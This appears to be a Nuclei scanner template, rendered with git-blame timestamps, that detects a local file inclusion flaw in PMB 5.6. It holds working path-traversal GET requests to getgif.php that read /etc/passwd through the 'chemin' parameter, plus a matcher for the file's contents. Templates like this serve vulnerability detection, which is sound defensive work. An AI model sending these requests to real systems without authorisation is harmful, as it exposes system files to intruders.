2021-08-16 10:44:02 +00:00
|
|
|
id: pmb-directory-traversal
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: PMB 5.6 - Local File Inclusion
|
2021-08-16 10:44:02 +00:00
|
|
|
author: geeknik
|
2022-08-29 20:21:30 +00:00
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: PMB 5.6 is vulnerable to local file inclusion because the PMB Gif Image is not sanitizing the content of the 'chemin' parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: lfi,packetstorm
|
2021-08-16 11:13:47 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-08-16 10:44:02 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
|
|
|
|
- "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
|
2021-10-08 13:40:03 +00:00
|
|
|
|
2021-10-08 06:33:40 +00:00
|
|
|
stop-at-first-match: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2021-08-16 10:44:02 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-08-16 11:13:47 +00:00
|
|
|
|
2021-08-16 10:44:02 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a00463044022004da6f24a3c5f69eb54a88f2747d49ac42bc47d3fdac84c44a3b3b27ffa9635702206eb29e2393af1c69b2152e46048fda95b549ee14a1f7943191a78a6ddd1ceb0b:922c64590222798bb761d5b6d8e72950
|